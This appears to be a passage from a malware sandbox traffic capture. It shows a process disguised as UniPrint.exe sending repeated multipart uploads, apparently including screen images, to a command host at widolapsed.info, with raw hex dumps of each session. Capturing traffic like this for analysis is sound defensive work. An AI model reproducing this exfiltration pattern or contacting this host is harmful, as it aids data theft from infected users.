                                                                                                      Data Ascii: %GRMdPtHjzhkK;o1U>-\FS*)V*NykNI3vRUQEQE((Q@RQKI@)h<7_fbsnp|c2S%tQviL=&iy\s|CJ]1%\!),8vErZ\c_<m
                                                                                                      2021-09-15 11:45:37 UTC909OUTData Raw: d4 a4 bb 85 84 f6 56 8f 72 ca 15 ae b0 c2 46 f7 23 76 d2 71 c6 76 e7 f1 e6 9e 35 9b d5 bd 9e ec 47 6f e6 4f 75 1d db 0d a7 01 d0 92 00 e7 a7 cc 73 5c f6 9a b7 f5 d8 da f0 68 92 3d 11 a4 6c 7d be c9 43 4d e4 44 cc cf 89 a4 00 65 57 e5 ed 90 32 70 39 eb 4b 6f e1 f9 e6 8a 17 fb 4d 9c 72 4e 92 3c 70 c9 21 0e 42 12 1f b6 06 36 93 c9 e7 b6 7a 55 7b 4d 52 7b 58 c2 1b 6b 59 f6 4c 6e 21 32 ab 13 0c 87 19 2b 82 33 d0 70 d9 1c 0e 29 b1 6a 77 71 bd b3 ed 89 9a da 29 62 52 c0 9d c2 4d db 89 e7 af ce 7f 4a 2f 52 df d7 6f f3 0b 53 2e 41 e1 fb ab ab 98 e2 b4 96 1b 88 e4 80 dc 2c d1 2c 8c bb 03 6d 3f 28 5d f9 dd c6 36 fe 9c d5 0b eb 49 6c 2f 65 b4 b8 18 92 23 83 c1 19 e3 20 e0 80 7a 1e e0 1a 92 db 54 b9 82 18 ad da 0b 79 ad e3 81 ad da 29 03 62 44 67 2f ce 08 39 0d c8 20
                                                                                                      Data Ascii: VrF#vqv5GoOus\h=l}CMDeW2p9KoMrN<p!B6zU{MR{XkYLn!2+3p)jwq)bRMJ/RoS.A,,m?(]6Il/e# zTy)bDg/9
                                                                                                      2021-09-15 11:45:37 UTC925OUTData Raw: c6 3f f1 f5 6f fe e1 fe 75 74 b7 26 7b a3 87 cd 14 52 56 27 58 b4 51 45 00 26 d1 e9 4e 14 51 40 05 2d 25 2d 31 07 7a 28 a2 80 0c d2 d2 52 d0 02 d1 49 4b 4c 42 51 4a 69 28 00 a2 8a 28 00 a2 8a 28 01 69 28 a5 a0 02 8a 28 a0 05 a0 52 51 9a 62 1d 45 25 2d 30 0a 28 a5 a0 41 4b 45 18 a6 21 69 69 28 a6 20 34 a2 92 94 50 02 8a 4a 51 48 69 88 29 69 28 14 80 70 a7 0a 6d 2d 52 13 16 8a 4a 5a 60 2d 14 51 41 22 d1 45 14 c0 28 a2 8a 04 38 52 d3 45 28 a6 80 5a 5a 4a 5a 64 85 2d 25 28 a6 02 d1 45 14 c4 2d 14 94 b4 08 29 69 29 69 a0 1d 45 20 a5 a6 48 52 8a 28 a6 02 d1 40 a5 a6 21 29 29 68 a0 04 1d 69 f4 c1 d6 9f 42 06 14 1a 28 a6 48 0a 5a 41 4e c5 08 18 a0 53 a9 b4 e1 54 89 62 77 a5 a4 3d 69 c2 98 08 29 d4 da 51 4c 4c 5a 28 a2 81 00 a5 a4 14 ea 62 12 9d 49 45 30 63 a9 69
                                                                                                      Data Ascii: ?out&{RV'XQE&NQ@-%-1z(RIKLBQJi(((i((RQbE%-0(AKE!ii( 4PJQHi)i(pm-RJZ`-QA"E(8RE(ZZJZd-%(E-)i)iE HR(@!))hiB(HZANSTbw=i)QLLZ(bIE0ci
                                                                                                      2021-09-15 11:45:37 UTC941OUTData Raw: ad 3d 36 69 27 85 da 56 27 0d 81 90 33 d3 db df 35 ce 0b 80 c9 77 74 88 b1 ab ed 85 15 79 51 dd bf 45 fd 6b a5 d3 51 92 c6 2d e3 e6 61 b9 be a7 9a 9a d1 51 5b 0e 8c 9c a5 b9 6a 8a 28 ae 63 a8 e7 7c d9 ed ae b5 bb 98 18 8f 22 ee 29 24 50 01 df 18 8a 3d c3 eb 8c 91 8e e0 55 6b ad 56 e0 4d 64 f7 1a bf f6 7d a5 ea cf 28 76 48 c6 d4 05 3c b0 0b 02 01 20 e7 9c fd e2 3d 31 d1 df 5a fd b6 d8 c0 d3 4b 12 37 0f e5 e0 17 5e ea 49 07 00 fb 60 fa 11 48 d6 50 b5 ed bd d0 dc af 6f 1b c6 8a 31 b7 0d b7 3c 7f c0 45 1f d7 e0 33 95 9f 5a d5 bc fd 3d 25 bc b5 b1 0f 6b 1c b9 b9 91 60 13 b9 63 b8 61 91 b3 c0 5f 94 15 23 77 5f 4d 4d 54 6c f1 5e 93 2c 97 cf 02 34 33 22 a7 c8 15 db 29 f2 e4 8c e5 bd 01 cf cb c6 39 ce fd 14 3d 44 71 5a 5d de a7 a7 e8 d6 3e 44 c6 eb cd d2 a5 9a 2b
                                                                                                      Data Ascii: =6i'V'35wtyQEkQ-aQ[j(c|")$P=UkVMd}(vH< =1ZK7^I`HPo1<E3Z=%k`ca_#w_MMTl^,43")9=DqZ]>D+
                                                                                                      2021-09-15 11:45:37 UTC957OUTData Raw: 93 b2 d0 8a 95 15 35 ce d5 ec 6e 59 e8 d6 e1 36 5b 59 89 36 8e 49 4d c7 f1 aa fa 87 87 05 c2 b0 8e d5 a1 98 74 2a 84 7e 62 b7 46 ff 00 ec db 71 16 4c 63 3b f1 fd fc f7 fc 31 5b 7a 6f 9b f6 14 f3 f3 bb 27 6e ee bb 7b 7f 5a c3 13 4a 54 30 eb 10 a5 af 63 d1 86 3a 9d 69 fb 28 c3 dd 3c 5a 68 9e 09 9e 29 54 ab a1 2a c0 f6 34 ca da f1 8f 97 ff 00 09 45 ef 95 8c 6e 5c e3 d7 68 cf eb 58 b5 b5 39 73 c1 4b ba 38 a4 ac da 0a 9e da d9 ee 64 d8 8c 8b ee e7 02 a0 ab fa 35 b7 da f5 18 60 da 8d bd c0 c3 67 a7 7c 63 da b4 4a ee c4 b7 65 73 7a 3f 04 4a 61 46 9b 52 82 39 19 43 14 11 b3 60 7d 45 33 fe 10 de 71 fd a9 08 ff 00 b6 4d 5d d5 a5 d4 08 64 96 59 23 ce 76 88 cb ed ca 8f 71 d3 9a af a8 de c3 70 16 3b 68 96 32 4e 1b 12 16 cf e6 2b 78 c2 2c e7 94 e4 ba 9e 6b ae e9 2d a3
                                                                                                      Data Ascii: 5nY6[Y6IMt*~bFqLc;1[zo'n{ZJT0c:i(<Zh)T*4En\hX9sK8d5`g|cJesz?JaFR9C`}E3qM]dY#vqp;h2N+x,k-
                                                                                                      2021-09-15 11:45:37 UTC960OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 35 37 31 34 39 31 31 34 32 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2571491142--
                                                                                                      2021-09-15 11:45:37 UTC960INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:37 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=ef4cd9e59b43a1592fdd724fc97f6d09dc93332053352ed0f8b5cf10b037f7de; expires=Thu, 15-Sep-2022 11:45:37 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:37 UTC960INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      12192.168.2.34976545.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:38 UTC960OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 82926
                                                                                                      Content-Type: multipart/form-data; boundary=--------3335732562
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:38 UTC961OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 33 33 35 37 33 32 35 36 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3335732562Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:38 UTC961OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 0a ba 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:45:38 UTC961OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:38 UTC977OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:45:38 UTC993OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:45:38 UTC1009OUTData Raw: 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b 9a 5c d2 2d 31 d9 a7 03 51 d3 c5 26 8a 4c 7d 28 a6 8a 5a 93 44 c7 53 85 30 1a 76 45 22 93 1d 9a 70 a6 66 97 26 a5 a2 d3 24 a2 9a 09 a5 fa 9a 4d 14 98 f1 4b 91 51 ef 41 d5 87 e7 4c 6b 98 13 ab 83 4b 95 87 3a 5d 4b 20 fc a7 e9 5c 67 8a 3f e3 f6 2f fa e4 2b a6 3a 94 0b 90 32 6b 99 f1 29 cd dc 27 fe 99 0f e7 55 18 b5 b8 29 a9 4b 43 8b a2 8a dc bc 29 0f 85 f4 e3 1c ba 7c 6f 34 2e 5e 37 b5 0d 34 a7 cd 61 90 fb 0e 30 07 f7 87 4a e0 6e
                                                                                                      Data Ascii: X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc\-1Q&L}(ZDS0vE"pf&$MKQALkK:]K \g?/+:2k)'U)KC)|o4.^74a0Jn
                                                                                                      2021-09-15 11:45:38 UTC1025OUTData Raw: d7 ff 00 02 1b ff 00 88 a0 0b 54 55 5f 33 50 ff 00 9f 5b 5f fc 08 6f fe 22 8f 33 50 ff 00 9f 5b 5f fc 08 6f fe 22 80 2d 51 55 7c cd 43 fe 7d 6d 7f f0 21 bf f8 8a 3c cd 43 fe 7d 6d 7f f0 21 bf f8 8a 00 b5 45 55 f3 35 0f f9 f5 b5 ff 00 c0 86 ff 00 e2 29 92 5c de 42 11 a6 b6 80 21 91 10 95 9c 92 37 30 5c e3 60 f5 a0 0b b4 51 45 00 15 e4 ff 00 15 bf e4 62 b6 ff 00 af 51 ff 00 a1 35 7a c5 79 3f c5 6f f9 18 ad bf eb d4 7f e8 4d 57 4f e2 22 7b 1c 50 a5 a4 a2 ba 8e 71 d4 52 52 d0 20 a2 8a 29 80 52 d2 51 40 0b 45 25 14 00 b4 52 52 d0 01 45 14 50 20 a2 8a 28 00 a5 a4 a2 98 0b 45 25 2d 00 2d 14 94 50 16 16 8a 4a 5a 00 28 a2 8a 62 16 8a 4a 28 01 69 69 29 69 a1 0b 45 25 2d 31 06 68 cd 25 2e 45 17 01 68 a4 cd 19 a2 e1 61 68 cd 25 02 80 b0 b9 a2 8a 28 00 a2 8a 28 10 b4
                                                                                                      Data Ascii: TU_3P[_o"3P[_o"-QU|C}m!<C}m!EU5)\B!70\`QEbQ5zy?oMWO"{PqRR )RQ@E%RREP (E%--PJZ(bJ(ii)iE%-1h%.Ehah%((
                                                                                                      2021-09-15 11:45:38 UTC1041OUTData Raw: d3 05 78 23 cc 4f f1 aa 57 76 77 16 52 88 ae a3 d8 e5 77 01 90 78 fc 3e 95 d1 ca d2 d8 d5 49 3e a4 15 6b 4e bf 9f 4d bc 5b ab 6d 9e 62 e7 1b 97 23 9f 6a 76 9f a5 5e ea 5e 67 d8 a0 f3 7c bc 6e f9 d4 63 39 c7 52 3d 0d 5d ff 00 84 5f 5b ff 00 9f 2f fc 8a 9f e3 4d 46 5b a4 4b 94 76 6c 98 f8 b7 53 3f f2 ce d3 fe fc 0a 69 f1 5e a4 7a 2d b0 3e a2 10 2a 3f f8 45 f5 af f9 f2 ff 00 c8 a9 fe 34 7f c2 2f ad ff 00 cf 97 fe 45 4f f1 ab bd 5f 32 2d 4b c8 c7 62 59 8b 31 24 93 93 49 5b 3f f0 8b eb 5f f3 e5 ff 00 91 53 fc 6a 96 a1 a5 de e9 be 5f db 60 f2 bc cc ed f9 94 e7 18 cf 42 7d 45 43 8c 96 ad 1a 29 45 e8 99 4e 8a 28 a9 28 28 a2 8a 00 28 a2 8a 00 28 a2 8a 40 14 51 45 00 14 94 b4 94 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 51 45 14 0c 28 a2 8a 00
                                                                                                      Data Ascii: x#OWvwRwx>I>kNM[mb#jv^^g|nc9R=]_[/MF[KvlS?i^z->*?E4/EO_2-KbY1$I[?_Sj_`B}EC)EN(((((@QEQEQEQEQEQEQE(
                                                                                                      2021-09-15 11:45:38 UTC1042OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 33 33 35 37 33 32 35 36 32 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3335732562--
                                                                                                      2021-09-15 11:45:40 UTC1042INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:45:38 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=54f790c46c8dc0819b9f3be8ec19ea40856b9f1ee1cf970e5b4241b5eb21ec1e; expires=Thu, 15-Sep-2022 11:45:38 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:45:40 UTC1042INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      13192.168.2.34977145.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:45:41 UTC1042OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 83052
                                                                                                      Content-Type: multipart/form-data; boundary=--------1291895716
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:45:41 UTC1042OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 39 31 38 39 35 37 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1291895716Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:45:41 UTC1042OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 94 bb 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:45:41 UTC1042OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:45:41 UTC1058OUTData Raw: 2d 29 bb a3 aa 9d 3c 3d 7b c6 0a cc f2 8a cf d6 7f e3 d1 3f eb a0 fe 46 ba 2f 10 d8 0d 3b 58 9a 04 18 8c fc e9 f4 3d bf 98 ae 77 59 ff 00 8f 44 ff 00 ae 83 f9 1a ec a9 25 2a 4e 4b aa 38 e9 c5 c6 b2 8b e8 cc 5a 28 a2 bc c3 d5 0a 28 a4 a0 0f 7a 96 00 ff 00 32 70 df ce a0 19 07 07 a8 ab 86 a9 b1 fd eb ff 00 bc 6b e5 ea 25 b9 eb c5 92 29 af 18 d7 bf e4 60 d4 bf eb ea 5f fd 0c d7 b3 29 af 19 d7 bf e4 60 d4 bf eb ea 5f fd 0c d7 a1 96 7c 52 39 71 7b 22 85 2d 25 2d 7b 27 10 51 8a 28 a0 41 8a f4 ff 00 85 3c 69 37 df f5 dc 7f e8 35 e6 15 e9 df 0a bf e4 13 7d ff 00 5d c7 fe 83 59 d5 f8 4d 29 fc 47 75 49 59 36 36 b0 3e 93 6d 73 73 3d d6 5a 05 92 47 37 72 81 f7 41 27 ef 55 94 b0 b5 92 35 78 e6 ba 65 61 90 45 e4 b8 23 fe fa ac 5c 62 9e ff 00 87 fc 13 45 29 35 b7 e3 ff
                                                                                                      Data Ascii: -)<={?F/;X=wYD%*NK8Z((z2pk%)`_)`_|R9q{"-%-{'Q(A<i75}]YM)GuIY66>mss=ZG7rA'U5xeaE#\bE)5
                                                                                                      2021-09-15 11:45:41 UTC1074OUTData Raw: 69 4d 00 2e 68 cf a5 36 97 06 80 1d 9a 4c d0 05 38 0a 04 20 14 e0 28 02 9d 41 2d 85 25 2e 28 c5 31 05 2d 25 2d 02 0a 72 d3 69 68 01 f4 53 69 c2 99 22 d1 49 4b 40 8b 3a 77 fc 7f 45 f5 a7 de 9f f4 d9 7f de a6 69 df f1 fd 17 d6 96 ec e6 ea 4f f7 ab 0f f9 7a 5b fe 19 15 25 14 56 a6 22 d1 49 4b 40 05 14 51 40 85 a2 92 96 90 05 14 51 40 82 96 92 96 90 05 2d 25 28 a0 42 8a 5a 4a 5a 42 16 ac 40 dd 05 56 a9 ad fe f5 44 b6 34 a4 ed 23 5f 56 38 f0 d0 f7 6a e2 5f ad 76 7a cf 1e 1a 4f f7 ab 8b 73 cd 63 85 f8 1f a9 ea 57 f8 d7 a1 de 8e 3c 3b 65 f4 15 47 35 75 b8 f0 fd 88 ff 00 64 7f 2a a3 5c f4 7a fa 9a 62 1f bc bd 05 cd 19 a4 a4 ad 8e 7b 8e cd 28 6a 68 a2 8b 02 63 f2 69 db 8f ad 30 52 d4 b4 5a 6c 90 31 a7 06 35 10 a7 66 a5 a2 94 99 28 73 eb 4e 13 30 e8 c6 a1 06 96 a5
                                                                                                      Data Ascii: iM.h6L8 (A-%.(1-%-rihSi"IK@:wEiOz[%V"IK@Q@Q@-%(BZJZB@VD4#_V8j_vzOscW<;eG5ud*\zb{(jhci0RZl15f(sN0
                                                                                                      2021-09-15 11:45:41 UTC1090OUTData Raw: 1d 9b 19 45 4e b6 93 b7 dd 8d bf 2a 9d 34 cb a6 ff 00 96 46 a1 d4 8a ea 52 a5 37 b2 29 51 5a 8b a3 4e 7e f1 55 fa 9a 78 d2 63 5e 64 b9 8c 7e 35 9b c4 43 b9 6b 0d 51 f4 32 78 a3 15 af f6 4d 36 3f f5 97 40 fd 28 f3 74 88 ff 00 bc f4 bd bf 64 ca 58 67 d5 a4 64 e2 9e 23 73 c0 52 7f 0a d1 3a 96 9f 1f fa bb 52 7e b4 87 5c 0b fe aa d6 31 f5 a3 da 54 7b 44 3d 85 35 bc 8a 8b 69 3b 74 8c fe 55 6e d3 4d b8 f3 43 14 3d 6a 36 d7 6e 8f dd 08 bf 41 4c 4d 56 f1 e4 5c ca 70 4f 61 53 25 59 a3 4a 6a 84 64 b7 65 cf 19 ae d8 6d 41 f4 ae 5f 4f ff 00 90 8d bf fd 74 5a e9 bc 62 4b 5b 5a 13 d4 ad 73 3a 7f fc 84 6d ff 00 eb a0 fe 74 b0 ff 00 c0 3a eb 7f 18 f4 2d 45 2d cc c1 a6 94 29 c7 4a a4 66 d3 63 ea e4 d5 6f 12 12 2f 57 07 f8 6b 17 af 7a c2 85 0e 68 26 d9 38 9c 67 25 47 15 13
                                                                                                      Data Ascii: EN*4FR7)QZN~Uxc^d~5CkQ2xM6?@(tdXgd#sR:R~\1T{D=5i;tUnMC=j6nALMV\pOaS%YJjdemA_OtZbK[Zs:mt:-E-)Jfco/Wkzh&8g%G
                                                                                                      2021-09-15 11:45:41 UTC1106OUTData Raw: f1 14 01 6a 8a ab e6 6a 1f f3 eb 6b ff 00 81 0d ff 00 c4 51 e6 6a 1f f3 eb 6b ff 00 81 0d ff 00 c4 50 05 aa 2a af 99 a8 7f cf ad af fe 04 37 ff 00 11 47 99 a8 7f cf ad af fe 04 37 ff 00 11 40 16 a8 aa be 66 a1 ff 00 3e b6 bf f8 10 df fc 45 1e 66 a1 ff 00 3e b6 bf f8 10 df fc 45 00 5a a2 aa f9 9a 87 fc fa da ff 00 e0 43 7f f1 14 79 9a 87 fc fa da ff 00 e0 43 7f f1 14 01 6a 8a ab e6 6a 1f f3 eb 6b ff 00 81 0d ff 00 c4 53 24 b9 bc 84 23 4d 6d 00 43 22 21 2b 39 24 6e 60 b9 c6 c1 eb 40 17 68 a2 8a 00 2b c9 fe 2b 7f c8 c5 6d ff 00 5e a3 ff 00 42 6a f5 8a f2 7f 8a df f2 31 5b 7f d7 a8 ff 00 d0 9a ae 9f c4 44 f6 38 a1 4b 49 45 75 1c e3 a8 a4 a5 a0 41 45 14 53 00 a5 a4 a2 80 16 8a 4a 28 01 68 a4 a5 a0 02 8a 28 a0 